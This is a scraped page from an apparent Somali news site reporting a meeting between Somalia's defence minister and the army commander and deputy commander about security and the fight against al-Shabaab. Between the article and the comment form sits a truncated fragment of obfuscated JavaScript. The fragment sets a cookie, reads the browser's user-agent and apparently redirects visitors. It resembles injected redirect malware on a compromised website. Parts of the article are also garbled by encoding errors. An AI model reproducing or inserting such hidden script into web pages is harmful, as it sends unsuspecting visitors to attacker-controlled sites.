Friday, May 1, 2026
HomeWararSawirr:- Wasiir Gaashaandhigga XFS Oo Kula La Qaatay Taliyaha Iyo Amaanduulaha CXDS

Sawirr:- Wasiir Gaashaandhigga XFS Oo Kula La Qaatay Taliyaha Iyo Amaanduulaha CXDS

Xarunta Wasaaradda Gaashaandhigga Xukuumadda Faderaalka Soomaaliya Waxaa Maanta Kulan Ku Qaatay Wasiirka Wasaaradda Gaashaandhigga Soomaaliya Xasan Cali Maxa��ed (Amar Dambe), Taliyaha Ciidanka Xoogga Dalka Iyo Sidoo Kale Amaanduulaha Ciidanka Soomaaliya.

Kulankooda Oo Socday Muddo Kooban Ayey Waxa Ay Uga Wada-hadleen arrimo Fara-badan Oo La Xariira der-der Gelinta Hawlaha Horyaala Taliyaha Iyo Amaanduulaha Ciidanka Xoogga Dalka Ee Quseysa Arrimaha Ciidanka Dalka.

Wasiirka Gaashaandhigga Xukuumadda Soomaaliya Ayaa Waxa Uu Sheegay In Uu Kula Dar-daarmay Sara U Qaadida Hawlaha Ciidanka Iyo Amniga Guud Ee dalka.

Wasiirku Waxa Uu Tilmaamay In Ay Lagama Maarmaan Tahay In Wax Badan Laga Qabto Amniga Guud Ee Dalka Iyo Sara U Qaadidda Dagaalka Lagula Jiro Xarakada Al-shabaabta Soomaaliya.

Dhankooda Taliyaha Iyo Amaanduulaha Ciidanka Xoogga Dalka Soomaaliyeed Ayaa Waxa Ay hoosta Ka Xariiqeen In Ay Ka Goa��an tahay der-der Gelinta Hawlaha Horyaala Oo Ay Masa��uuliyadoda qaadeen.

Kulanka Wasiirka Gaashaandhigga Soomaaliya Uu La Qaatay Taliyaha Iyo Amaanduulaha Ciidanka Xoogga Dalka Soomaaliyeed Ayaa Waxa Uu Imaanayaa Xilli Shalay Taliyaha Cusub Ee Ciidanka Soomaaliya Indha-Qarshe Oo Xilkii Kala Wareegay Taliyihii Hore Ee C/weli Jaamac Xuseen (Gorod) ka Dib Munaasabad ka Dhacday Xarunta Wasaaradda Gaashaandhigga Xukuumadda Soomaaliya Ee Muqdisho.

 

 
10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe